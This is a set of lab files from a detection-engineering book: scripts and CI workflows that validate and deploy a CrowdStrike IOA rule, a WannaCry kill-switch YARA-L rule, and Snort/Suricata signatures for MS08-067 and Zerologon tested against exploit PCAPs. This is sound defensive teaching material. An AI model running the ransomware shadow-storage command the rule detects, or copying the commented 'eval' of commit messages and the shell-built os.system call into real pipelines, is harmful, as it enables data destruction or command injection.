12 | idna==3.6
13 | pydantic==2.5.3
14 | pydantic_core==2.14.6
15 | sgmllib3k==1.0.0
16 | sniffio==1.3.0
17 | sse-starlette==1.8.2
18 | starlette==0.35.1
19 | typing_extensions==4.9.0
20 | uvicorn==0.25.0
21 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
8 | def uploadioa(ioc_body):
9 | BODY = ioc_body
10 | response = falcon.command("create_rule",
11 | retrodetects=False,
12 | ignore_warnings=True,
13 | body=BODY
14 | )
15 | #print(response)
16 | return response
17 |
18 | if __name__ == '__main__':
19 | parser = argparse.ArgumentParser(
20 | prog='custom-ioa-cs',
21 | description='Takes JSON formatted payload for a custom IOA',
22 | epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
23 | )
24 | parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
25 | parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
26 | args = parser.parse_args()
27 |
28 | #assign secrets from env variables or arguments from CLI
29 | CLIENT_ID = args.id
30 | CLIENT_SECRET = args.secret
31 |
32 |
33 | #client setup do outside of function so you arent using against call quotas each post
34 | falcon = APIHarnessV2(client_id=CLIENT_ID,
35 | client_secret=CLIENT_SECRET
36 | )
37 |
38 | #construct body read from external file like a real CI
39 | file_handle = open('test-rule-import.json', 'r')
40 | BODY = json.loads(file_handle.read())
41 | #print(type(BODY))
42 | #print(BODY)
43 |
44 | #call function with parameters
45 |
46 | response = uploadioa(BODY)
47 | json_response = json.dumps(response)
48 | print(json_response)
49 |
50 |
51 | exit()
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/get-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from falconpy import APIHarnessV2
4 |
5 | CLIENT_ID = os.getenv('CS_CLIENT_ID')
6 | CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')
7 |
8 | # Do not hardcode API credentials!
9 | falcon = APIHarnessV2(client_id=CLIENT_ID,
10 | client_secret=CLIENT_SECRET
11 | )
12 |
13 | BODY = {
14 | "ids": ["1"]
15 | }
16 |
17 | response = falcon.command("get_rules_get", body=BODY)
18 | #print(type(response))
19 | json_response = json.dumps(response)
20 | print(json_response)
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/github-action-deploy-customioa.yml:
--------------------------------------------------------------------------------
1 | #DE part of EDR CI init with GHEC use github.com/UKGEPIC/detection-engineering-edr
2 | name: Connect to an AWS role from a GitHub repository
3 | on:
4 | push:
5 | branches: [ main ]
6 | pull_request:
7 | branches: [ main ]
8 |
9 | env:
10 | ## TODO Figure out Secrets Management since Github Secrets and Env Variables are Not Approved yet. See
11 | #ensure this matches the final custom-ioa-cs.py function calls for the API client
12 | CLIENT_ID : "foo"
13 | CLIENT_SECRET : "bar"
14 |
15 | # Permission can be added at job level or workflow level
16 | permissions:
17 | #id-token: write # This is required for requesting the JWT
18 | contents: read # This is required for actions/checkout
19 | jobs:
20 | DeployFalconCustomIOAs:
21 | runs-on: ubuntu-latest
22 | steps:
23 | - name: Git clone the repository
24 | uses: actions/checkout@v3 #ensure repo is checked out so working directory is same
25 | - name: Setup Python Packages
26 | uses: actions/setup-python@v5
27 | with:
28 | python-version: '3.10'
29 | cache: 'pip'
30 | - run: pip install -r ./requirements.txt
31 | - name: Validate Syntax
32 | #TODO linter-custom-ioa.py needs refactor to include arguments to specify the usecase files
33 | run: |
34 | python linter-custom-ioa.py
35 | - name: Deploy CS Falcon Custom IOA
36 | #TODO custom-ioa-cs.py neeeds refactor to use env variables instead of passing parameters for API client
37 | run: |
38 | python custom-ioa-cs.py ./path/to/usecaseimport.json
39 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/helloWorld-sysargv-example.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import sys
3 | #python considers sysargv[0] itself as a script first arg is 1
4 | #you can set the shell env variable e.g. export TEST='bar'
5 | #now run python3 helloWorld-sysargv-example.py $TEST
6 | #no immediate need to refactor scripts that use arguments, just specify the shell variable :)
7 | print('hello foo', sys.argv[1])
8 |
9 | #but of course if you wanted to intake direct shell variables
10 | #just comment or remove the argument or parser requirements and replace with similar:
11 | #export TEST='myLittleSecret'
12 | import os
13 | api_secret = os.getenv('TEST') #this is the variable name from the shell without the $ ref
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/linter-custom-ioa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import jsonschema, json
3 |
4 | #raw openapi spec
5 | #https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json
6 |
7 | #2023-dec-28 us-2 falcon
8 | custom_ioa_schema = {
9 | "comment": "string",
10 | "description": "string",
11 | "disposition_id": 0,
12 | "field_values": [
13 | {
14 | "final_value": "string",
15 | "label": "string",
16 | "name": "string",
17 | "type": "string",
18 | "value": "string",
19 | "values": [
20 | {
21 | "label": "string",
22 | "value": "string"
23 | }
24 | ]
25 | }
26 | ],
27 | "name": "string",
28 | "pattern_severity": "string",
29 | "rulegroup_id": "string",
30 | "ruletype_id": "string"
31 | }
32 |
33 | try:
34 | #imported sample use case
35 | file_handle = open('test-rule-import.json', 'r')
36 |
37 | use_case_payload = json.load(file_handle)
38 |
39 | results = jsonschema.validate(instance=use_case_payload,
40 | schema=custom_ioa_schema)
41 | #print(results)
42 | if 'None' in str(results):
43 | print('Custom use case payload VALIDATED')
44 | elif str(results) != 'None':
45 | print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023.' +
46 | 'See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
47 | exit(1)
48 | except:
49 | exit(1)
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/requirements.txt:
--------------------------------------------------------------------------------
1 | attrs==23.1.0
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.5
5 | idna==3.6
6 | jsonschema==4.20.0
7 | jsonschema-specifications==2023.12.1
8 | referencing==0.32.0
9 | requests==2.31.0
10 | rpds-py==0.15.2
11 | urllib3==2.1.0
12 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/WannaCry Malware Profile _ Mandiant.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.2/WannaCry Malware Profile _ Mandiant.pdf
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-rule-payload-check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, re, requests
3 |
4 | #test criteria needed
5 | payload_match = 'fsodp9ifjaposdfjhgosurijfaewrwergwea'
6 | file_path = 'wannacry_killswitch_domain.yaral'
7 |
8 | #set user agent in case WAF rules
9 | ua_header = {
10 | 'User-Agent':
11 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
12 | }
13 |
14 | #read file from directory
15 | file_handle = open(file_path, "r")
16 | yara_rule = file_handle.read() #reads as giant serialized string
17 |
18 | #re.search find the first instance serialized but returs re.match
19 | url_match = re.search('reference\s\=\s"(\S{10,100})"', yara_rule)
20 | url = url_match.group(1)
21 | try:
22 | if url != "":
23 | print('ok')
24 | response = requests.get(url, headers=ua_header)
25 | #print(type(response.content))
26 | content = str(response.content)
27 | #print(content)
28 | if payload_match in content:
29 | print('Check 1/2: Found payload IOC/IOA in Content Ref:')
30 | #print(url)
31 | #print(content)
32 | try:
33 | if payload_match in yara_rule:
34 | print('Check 2/2: Found expected payload in yara rule')
35 | except ValueError:
36 | print('error: did not find expected payload in rule')
37 | file_handle.close()
38 | exit(1)
39 | except ValueError:
40 | print('error: reference filled missing or non-url')
41 | file_handle.close()
42 | exit(1)
43 |
44 | #exit close
45 | file_handle.close()
46 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-rule-testspec-ci.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env/python3
2 | import os, re, requests
3 | from pathlib import Path
4 |
5 | #python requires more stuff for relative path
6 | current_dir = Path.cwd()
7 | relative_path = Path('tests/testspec.txt')
8 | absolute_path = current_dir / relative_path
9 |
10 | #use a test build spec from a github repo
11 | file_handle = open(absolute_path, 'r')
12 | test_spec = file_handle.read()
13 |
14 | payload_match = re.search('payload: (.{3,128})', test_spec)
15 | payload = payload_match.group(1)
16 |
17 | file_path_match = re.search("file_path: (.{2,100}\\.yaral)", test_spec)
18 | file_path = file_path_match.group(1)
19 |
20 | file_handle.close()
21 |
22 | #test criteria needed
23 | #payload_match = 'fsodp9ifjaposdfjhgosurijfaewrwergwea'
24 | #file_path = 'wannacry_killswitch_domain.yaral'
25 |
26 | #set user agent in case WAF rules
27 | ua_header = {
28 | 'User-Agent':
29 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
30 | }
31 |
32 | #read file from directory
33 | file_handle = open(file_path, "r")
34 | yara_rule = file_handle.read() #reads as giant serialized string
35 |
36 | #re.search find the first instance serialized but returs re.match
37 | url_match = re.search('reference\s\=\s"(\S{10,100})"', yara_rule)
38 | url = url_match.group(1)
39 | try:
40 | if url != "":
41 | print('ok')
42 | response = requests.get(url, headers=ua_header)
43 | #print(type(response.content))
44 | content = str(response.content)
45 | #print(content)
46 | if payload in content:
47 | print('Check 1/2: Found payload IOC/IOA in Content Ref:')
48 | #print(url)
49 | #print(content)
50 | try:
51 | if payload in yara_rule: #modified to use the payload and not payload_match new var
52 | print('Check 2/2: Found expected payload in yara rule')
53 | except ValueError:
54 | print('error: did not find expected payload in rule')
55 | file_handle.close()
56 | exit(1)
57 | except ValueError:
58 | print('error: reference filled missing or non-url')
59 | file_handle.close()
60 | exit(1)
61 |
62 | #exit close
63 | file_handle.close()
64 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-unittest.yml:
--------------------------------------------------------------------------------
1 | # simple unit payload based testing from meta in a CI
2 | # best to chain this workflow as reusable to a deployment workflow
3 | # reference within from your deployment action:
4 | # - name: run reusable unittest workflow
5 | # uses: ./.github/workflows/unitetest-workflow-file.yml
6 |
7 |
8 | name: Chronicle YARA-L Rule Payload Unit Payload Tests
9 |
10 | # Controls when the workflow will run
11 | on:
12 | push:
13 | branches: [ "main" ]
14 | paths:
15 | - tests/*
16 | #- chron-rules/*
17 | pull_request:
18 | branches: [ "main" ]
19 |
20 | # Allows you to run this workflow manually from the Actions tab
21 | workflow_dispatch:
22 |
23 | #dont need env variables for simple unit tests.
24 | #though you could specify in your commit message which file test name to use and rules and use eval
25 | #env:
26 | #test_payload: ${{ github.event.head_commit.message }}
27 |
28 | permissions:
29 | contents: read # This is required for actions/checkout
30 |
31 | jobs:
32 | DetectionTestTrigger:
33 | # The type of runner that the job will run on
34 | runs-on: ubuntu-latest #based on logical combination of labels
35 | steps:
36 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
37 | - uses: actions/checkout@v4
38 |
39 | #apparently github python is bare with no requests lib
40 | - name: Setup Python Packages
41 | uses: actions/setup-python@v5
42 | with:
43 | python-version: '3.10'
44 | cache: 'pip'
45 | - run: pip install -r ./requirements.txt
46 |
47 | # if you wanted to pass arguments from the message refactoring the script you can
48 | #- name: Execute Payload from Commit Message
49 | # continue-on-error: true #doesnt gurantee trigger just bash not exiting on a non 0 condition
50 | # run: eval $test_payload
51 |
52 | - name: Run Tests
53 | run: |
54 | python ./tests/chron-yara-rule-testspec-ci.py #script relies on relative ./tests/testspec.txt file for runtime
55 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/tests/chron-yara-rule-testspec-ci.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env/python3
2 | import os, re, requests
3 | from pathlib import Path
4 |
5 | #python requires more stuff for relative path
6 | current_dir = Path.cwd()
7 | relative_path = Path('tests/testspec.txt')
8 | absolute_path = current_dir / relative_path
9 |
10 | #use a test build spec from a github repo
11 | file_handle = open(absolute_path, 'r')
12 | test_spec = file_handle.read()
13 |
14 | payload_match = re.search('payload: (.{3,128})', test_spec)
15 | payload = payload_match.group(1)
16 |
17 | file_path_match = re.search("file_path: (.{2,100}\\.yaral)", test_spec)
18 | file_path = file_path_match.group(1)
19 |
20 | file_handle.close()
21 |
22 | #test criteria needed
23 | #payload_match = 'fsodp9ifjaposdfjhgosurijfaewrwergwea'
24 | #file_path = 'wannacry_killswitch_domain.yaral'
25 |
26 | #set user agent in case WAF rules
27 | ua_header = {
28 | 'User-Agent':
29 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
30 | }
31 |
32 | #read file from directory
33 | file_handle = open(file_path, "r")
34 | yara_rule = file_handle.read() #reads as giant serialized string
35 |
36 | #re.search find the first instance serialized but returs re.match
37 | url_match = re.search('reference\s\=\s"(\S{10,100})"', yara_rule)
38 | url = url_match.group(1)
39 | try:
40 | if url != "":
41 | print('ok')
42 | response = requests.get(url, headers=ua_header)
43 | #print(type(response.content))
44 | content = str(response.content)
45 | #print(content)
46 | if payload in content:
47 | print('Check 1/2: Found payload IOC/IOA in Content Ref:')
48 | #print(url)
49 | #print(content)
50 | try:
51 | if payload in yara_rule: #modified to use the payload and not payload_match new var
52 | print('Check 2/2: Found expected payload in yara rule')
53 | except ValueError:
54 | print('error: did not find expected payload in rule')
55 | file_handle.close()
56 | exit(1)
57 | except ValueError:
58 | print('error: reference filled missing or non-url')
59 | file_handle.close()
60 | exit(1)
61 |
62 | #exit close
63 | file_handle.close()
64 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/tests/testspec.txt:
--------------------------------------------------------------------------------
1 | payload: fsodp9ifjaposdfjhgosurijfaewrwergwea
2 | file_path: wannacry_killswitch_domain.yaral
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/wannacry_killswitch_domain.yaral:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2021 Google LLC
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * https://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | rule malware_wannacry_killswitch_domain
18 | {
19 | meta:
20 | author = "Google Cloud Security"
21 | description = "WannaCry kill-switch domain"
22 | reference = "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
23 | yara_version = "YL2.0"
24 | rule_version = "1.0"
25 |
26 | events:
27 | $e1.metadata.event_type = "NETWORK_DNS"
28 | re.regex($e1.network.dns.questions.name, `(iffer|iuqer|iuqss)fsodp9ifjaposdfjhgosurijfaewrwergwea\.(com|test)`)
29 |
30 | condition:
31 | $e1
32 | }
33 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.3/rules/ms08-067-snort.rule:
--------------------------------------------------------------------------------
1 | alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ECLIPSEDWING MS08-067"; flow:to_server,established; content:"|ff|SMB|2f 00 00 00 00|"; offset:4; depth:9; content:"|00 00 00 00 ff ff ff ff 08 00|"; distance:30; within:10; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; fast_pattern; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; isdataat:800,relative; classtype:trojan-activity; sid:2024215; rev:1; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2019_07_26;)
--------------------------------------------------------------------------------
/chapter-05/lab-5.3/snort2panos-test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import re, os, argparse
3 |
4 | #runtime args
5 | parser = argparse.ArgumentParser()
6 | parser.add_argument('-dir', type=str, help='Provide the relative directory path of the snort rules to validate.')
7 | args = parser.parse_args()
8 |
9 | if not args.dir:
10 | print('Please provide directory for the *.rule files')
11 |
12 | #file and directory handles
13 | directory = os.fsencode(args.dir)
14 | for file in os.listdir(directory):
15 | file_handle = os.fsdecode(file)
16 | if file_handle.endswith(".rule"):
17 | full_path = (str(args.dir) + '/' +str(file_handle))
18 | file_bin = (open(full_path, 'r'))
19 | #snort_rule = file_bin.readline()
20 |
21 | #simple test if PAN-OS 10.x compliant content pattern length
22 | #https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/create-a-custom-threat-signature/create-a-custom-threat-signature-from-a-snort-signature
23 | #https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/custom-signature-pattern-requirements
24 |
25 | for snort_rule in file_bin:
26 | counter = 0
27 | content_sections = re.findall(r'content:"(.*?)";', snort_rule)
28 | for section in content_sections:
29 | num_chars = len(section) - section.count('|')
30 | print(f"Content Section: {section}")
31 | print(f"Total Characters: {num_chars}")
32 | print()
33 | try:
34 | if num_chars <= 127:
35 | print('Payload pattern is likely PAN-OS compliant')
36 | except ValueError:
37 | print('Payload pattern length too long for PAN-OS')
38 | exit(1)
39 |
40 | file_bin.close() #ensure close file handle for each file iteration
41 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/bash-testing/test-suricata-unittest-rules.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #variable
4 | RULE_NAME='ET EXPLOIT Possible Zerologon NetrServerAuthenticate'
5 | RULE_FILE='./rules/test-exploit-zerologon.rules'
6 | TEST_PCAP='./tests/cve-2020-1472-exploit.pcap'
7 |
8 | #cleanup logs
9 | rm -rf ./logs/*.log
10 | rm ./*.log
11 |
12 | #run suricata tests against pcaps
13 | suricata -c ./suricata-config.yml -r $TEST_PCAP -S $RULE_FILE
14 |
15 | #search for alerts
16 | RESULTS=$(grep -i "$RULE_NAME" ./fast.log | wc -l)
17 |
18 | if [[ $RESULTS -ge 1 ]]; then
19 | echo "TEST PASSED: $RULE_NAME matches $TEST_PCAP";
20 | exit 0 #exits clean
21 | else
22 | echo "TEST FAILED: $RULE_NAME does NOT match $TEST_PCAP";
23 | exit 1 #raises its own error
24 | fi
25 |
26 | #cleanup logs
27 | rm -rf ./logs/*.log
28 | rm ./*.log
29 |
30 |
31 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/bash-testing/test2-suricata-unittest-rules.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #set your desired test variables up here or through buildspec files
4 | RULES=(
5 | #'./rules/rule1.rules' 'Rule 1 Name'
6 | #'./rules/rule2.rules' 'Rule 2 Name'
7 | './rules/test-exploit-zerologon.rules' 'ET EXPLOIT Possible Zerologon NetrServerAuthenticate'
8 | )
9 |
10 | PCAPS=(
11 | #'./tests/pcap1.pcap'
12 | #'./tests/pcap2.pcap'
13 | '/tests/cve-2020-1472-exploit.pcap'
14 | )
15 |
16 | #iterate through everything
17 | for i in "${!RULES[@]}"; do
18 | RULE_FILE=${RULES[$i]}
19 | RULE_NAME=${RULES[$i+1]}
20 | for PCAP in "${PCAPS[@]}"; do
21 |
22 | #actual test execution
23 | suricata -c suricata.yaml -r $PCAP -S $RULE_FILE > /dev/null
24 |
25 | #validate the test
26 | RESULTS=$(grep -i "$RULE_NAME" fast.log | wc -l)
27 | if [[ $RESULTS -ge 1 ]]; then
28 | echo "PASSED: $RULE_NAME matched $PCAP"
29 | else
30 | echo "FAILED: $RULE_NAME did not match $PCAP"
31 | fi
32 |
33 | done
34 | done
35 |
36 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/buildspec.csv:
--------------------------------------------------------------------------------
1 | './rules/test-exploit-zerologon.rules','ET EXPLOIT Possible Zerologon NetrServerAuthenticate','./tests/cve-2020-1472-exploit.pcap'
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/rules/test-exploit-zerologon.rules:
--------------------------------------------------------------------------------
1 | alert tcp-pkt any any -> [$HTTP_SERVERS,$HOME_NET] ![139,445] (msg:"ET EXPLOIT Possible Zerologon NetrServerAuthenticate with 0x00 Client Credentials (CVE-2020-1472)"; flow:established,to_server; content:"|00|"; offset:2; content:"|1a 00|"; distance:19; within:2; content:"|5c 00 5c 00|"; within:50; content:"|24 00 00 00 06 00|"; distance:0; fast_pattern; content:"|00 00 00 00 00 00 00 00|"; distance:0; isdataat:!5,relative; threshold: type limit, count 5, seconds 30, track by_src; reference:url,www.secura.com/blog/zero-logon; reference:cve,2020-1472; classtype:attempted-admin; sid:2030871; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Server, created_at 2020_09_14, cve CVE_2020_1472, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, updated_at 2020_09_18;)
2 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/suricata-rule-test-ci.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import csv, os, time, glob
3 | #original pcaps oulled from https://github.com/CERTCC/PoC-Exploits/blob/master/cve-2020-1472/cve-2020-1472-exploit.pcap
4 | #parse buildspec.csv
5 | #format required: '/path/to/rule/file.rules','NAME OF RULE TO TEST','/path/to/pcap/test.pcap'
6 | csv_handle = open('buildspec.csv')
7 | reader = csv.reader(csv_handle)
8 | for row in reader:
9 | rule_file = row[0]
10 | rule_name = row[1]
11 | pcap = row[2]
12 |
13 | #touch equivalent fast.log even if one isnt generated so we can make it to the validation logic
14 | file_handle = open('fast.log', 'w')
15 | file_handle.close()
16 |
17 | # Run suricata
18 | cmd = f"suricata -c suricata-config.yml -r {pcap} -S {rule_file}"
19 | os.system(cmd)
20 |
21 | #let file system catch up
22 | time.sleep(1)
23 |
24 | #validation logic
25 | file_handle = open('fast.log', 'r', encoding='UTF-8')
26 | content = file_handle.read()
27 | rule_name = rule_name.replace("'", '')
28 | try:
29 | if rule_name in content:
30 | print(f"PASSED: {rule_name} found in {pcap}")
31 | else:
32 | print(f"FAILED: {rule_name} not detected with {pcap}")
33 | file_handle.close()
34 | exit(1)
35 | except ValueError:
36 | print('Test failed, exiting')
37 | file_handle.close()
38 | exit(1)
39 |
40 | #clean up old files if this is self-hosted
41 | for logfile in glob.glob('./*.log'):
42 | print('Deleting: ' + str(logfile))
43 | os.remove(logfile)
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/suricata-unit-test-ci.yml:
--------------------------------------------------------------------------------
1 | name: Suricata Unit Tests for Signatures
2 |
3 | # Controls when the workflow will run
4 | on:
5 | push:
6 | branches: [ "main" ]
7 | paths:
8 | - tests/*.pcap
9 | - rules/*.rules
10 | - buildspec.csv
11 | pull_request:
12 | branches: [ "main" ]
13 |
14 | # Allows you to run this workflow manually from the Actions tab
15 | workflow_dispatch:
16 |
17 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
18 | #env:
19 | #test_payload: ${{ github.event.head_commit.message }}
20 |
21 | permissions:
22 | contents: read # This is required for actions/checkout
23 |
24 | jobs:
25 | SuricataRuleUnitTests:
26 | # The type of runner that the job will run on
27 | runs-on: Ubuntu-latest
28 | environment: production
29 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
30 | defaults:
31 | run:
32 | shell: bash
33 | steps:
34 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
35 | - uses: actions/checkout@v4
36 |
37 | #deploy python and cache requirements
38 | - name: Setup Python Packages
39 | uses: actions/setup-python@v5
40 | with:
41 | python-version: '3.10'
42 | - name: Install Suricata
43 | run: |
44 | sudo apt install suricata -y
45 | - name: Run Unit Tests
46 | run: |
47 | python ./suricata-rule-test-ci.py
48 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Exfiltration-DNS-CreditCard-903.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Exfiltration-DNS-CreditCard-903.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Exfiltration-DNS-Sourcecode-903.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Exfiltration-DNS-Sourcecode-903.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Infiltration-CVE-2016-4117-1329.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Infiltration-CVE-2016-4117-1329.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Lateral-Movement-CVE-2023-21716-exploit.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Lateral-Movement-CVE-2023-21716-exploit.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Lateral-Movement-Sabbath-ransomware.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Lateral-Movement-Sabbath-ransomware.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/cve-2020-1472-exploit.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/cve-2020-1472-exploit.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.5/bad-code.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | echo "nyan cat"
3 | API_SECRET='cdossrunrundossrun'
4 | ##
5 |
6 | #
--------------------------------------------------------------------------------
/chapter-05/lab-5.5/instructions.txt:
--------------------------------------------------------------------------------
1 | 1. Run git init
2 | 2 git config user.name and git config user.email
3 | 3. Copy pre-commit to .git/hooks/
4 | 4. Make the file executable: chmod +x .git/hooks/pre-commit-grep-secrets
5 | 5. Make a change like an extra "#" too bad-code.sh
6 | 6. git add bad-code.sh
7 | 7. git commit -m "test hook"
--------------------------------------------------------------------------------
